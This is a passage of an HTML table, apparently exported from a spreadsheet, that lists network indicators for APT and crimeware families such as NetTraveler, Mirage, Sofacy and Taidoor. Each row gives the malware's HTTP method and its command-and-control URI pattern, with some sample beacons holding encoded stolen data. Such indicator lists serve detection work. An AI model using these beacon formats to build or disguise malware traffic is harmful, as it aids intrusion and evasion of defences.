<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Lingbo (?)"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Lingbo (?)</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/windowsupdatev7/search%3 Fhl%3cWABQAFMAUAAzACOAUgA5 ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADI ALgAyADkALgAwAC4AM\n>QAxADYA%26 meta%3DMDAwMGhI\u00c6\u00d1uMDk %3D%26id%3Dlfdxfircvscxggb"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/windowsupdatev7/search%3 Fhl%3cWABQAFMAUAAzACOAUgA5 ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADI ALgAyADkALgAwAC4AM<br />>QAxADYA%26 meta%3DMDAwMGhIÆÑuMDk %3D%26id%3Dlfdxfircvscxggb</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Luckycat - WIMMIE"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Luckycat - WIMMIE</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/count/count.php?m=c&n=[HOSTNAME]_"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/count/count.php?m=c&n=[HOSTNAME]_</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Medfos"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Medfos</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/uploading/id=1888546865&u= 4WWbvjA+sJYdYzrNmxr7vmGjfIZ4m ztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM 4RqxalcusDRHEOWDjvdOj3ww=="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/uploading/id=1888546865&u= 4WWbvjA+sJYdYzrNmxr7vmGjfIZ4m ztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM 4RqxalcusDRHEOWDjvdOj3ww==</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"MiniASP"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">MiniASP</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/device_<decoded ID string>asp?device_t=<random 10 digits>&key=<random 8 lowercaseletters>&device_id=<decoded ID string>&cv=<random 17 lowercase letters>"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/device_<decoded id="" string="">asp?device_t=<random 10="" digits="">&key=<random 8="" lowercaseletters="">&device_id=<decoded id="" string="">&cv=<random 17="" letters="" lowercase=""></random></decoded></random></random></decoded></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"MiniASP"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">MiniASP</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/record.asp?device_t=<random 10 digits> &key=<random 8 lowercase letters>&device_id=<decoded ID string>&cv=<random 17 lowercase letters>&result=<URLencoded result data>"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/record.asp?device_t=<random 10="" digits=""> &key=<random 8="" letters="" lowercase="">&device_id=<decoded id="" string="">&cv=<random 17="" letters="" lowercase="">&result=<urlencoded data="" result=""></urlencoded></random></decoded></random></random></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Miniduke"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Miniduke</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/index.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Mirage"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Mirage</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/resuIt?hl=en&meta=mdlyorvkildpiicqqownoatgvow"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/resuIt?hl=en&meta=mdlyorvkildpiicqqownoatgvow</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Mirage - later var"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Mirage - later var</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/search?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Money loader"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Money loader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/get_xml?file_id=25227372\n/dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/get_xml?file_id=25227372<br />/dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Mongal"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Mongal</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/3010850A0000F0FD0F003231 3744374432453631363433383338 0044454C4C5854000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000 00000000000000000001000007014C61757261000000000000000 00000000000000000000000000000000000000000000000000000 0000"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/3010850A0000F0FD0F003231 3744374432453631363433383338 0044454C4C5854000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000 00000000000000000001000007014C61757261000000000000000 00000000000000000000000000000000000000000000000000000 0000</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Murcy"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Murcy</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/150828"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/150828</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Netravler"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Netravler</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Netravler"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Netravler</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname= DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQa CuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIX <very long string> UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname= DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQa CuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIX <very long="" string=""> UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt</very></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Netravler"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Netravler</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT& hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQ aCicYTaZR6RDKbDYWCpKKBhM88YjIaj KXLfKOEmQ0nIxm86m46D0YVg::end\n /nt2012/asp/nettraveler.asp?hostid= 411CD510&hostname=mikepc& amp;hostip=10.12.0.23&filename= travlerbackinfo-2012-1-"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT& hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQ aCicYTaZR6RDKbDYWCpKKBhM88YjIaj KXLfKOEmQ0nIxm86m46D0YVg::end<br /> /nt2012/asp/nettraveler.asp?hostid= 411CD510&hostname=mikepc& amp;hostip=10.12.0.23&filename= travlerbackinfo-2012-1-</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"NfLog"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">NfLog</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/IElog/TestURL.asp HTTP/1.0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/IElog/TestURL.asp HTTP/1.0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"NfLog"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">NfLog</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/NfLog/Nfile.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/NfLog/Nfile.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"NTESSESS"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">NTESSESS</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/6K8gL8.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/6K8gL8.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"PNG trojan"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">PNG trojan</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/index.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Poison Ivy"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Poison Ivy</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"256 bytes of seemingly random data after a successful \nTCP handshake, then 48 byte \u201ckeep-alive\u201d requests"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">256 bytes of seemingly random data after a successful <br />TCP handshake, then 48 byte “keep-alive” requests</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"RedOctober AuthInfo"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">RedOctober AuthInfo</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"http://%s:%s%s"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">http://%s:%s%s</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"RedOctober Sysinfo"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">RedOctober Sysinfo</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/cgi-bin/nt/sk"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cgi-bin/nt/sk</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"RegSubDat"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">RegSubDat</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/5501000000/log"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/5501000000/log</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Sanny / Win32.Daws"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Sanny / Win32.Daws</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/write.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/write.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Seasalt"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Seasalt</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/postinfo.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/postinfo.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Sofacy"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Sofacy</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Sofacy"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Sofacy</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Srizbi"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Srizbi</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/cb_4.exe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cb_4.exe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Stabuniq"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Stabuniq</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/rssnews.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/rssnews.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Sykipot / Wyksol"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Sykipot / Wyksol</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/kys_allowget.asp?namegetkys.kys"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/kys_allowget.asp?namegetkys.kys</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Taidoor"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Taidoor</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/apzsr.php?id=021793111D309GE67E"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/apzsr.php?id=021793111D309GE67E</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Tarsip Eclipse"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Tarsip Eclipse</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Tarsip Moon"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Tarsip Moon</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif= qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp 7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif= qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp 7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Tbot tor"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Tbot tor</span></td><td data-sheets-value="[null,2,"n"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">n</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Tinba aka Zusy"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Tinba aka Zusy</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/h/index.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/h/index.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Vinself"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Vinself</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/w880/T19R17Q16/12010L11014"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/w880/T19R17Q16/12010L11014</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Vobfus"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Vobfus</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/XEuPCLrf?e"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/XEuPCLrf?e</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"WEBC2-Bolid"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">WEBC2-Bolid</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/firefox.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/firefox.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"WEBC2-Clover"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">WEBC2-Clover</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/Default.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/Default.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"WEBC2-CSON"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">WEBC2-CSON</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/Default.aspx?INDEX=<10_random_characters>"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/Default.aspx?INDEX=<10_random_characters><!--10_random_characters--><!--10_random_characters--><!--10_random_characters--><!--10_random_characters--><!--10_random_characters--><!--10_random_characters--></10_random_characters></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"WEBC2-CSON Response to commands"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">WEBC2-CSON Response to commands</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/Default.aspx?ID=IMNQRSSRXK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/Default.aspx?ID=IMNQRSSRXK</span></td></tr>
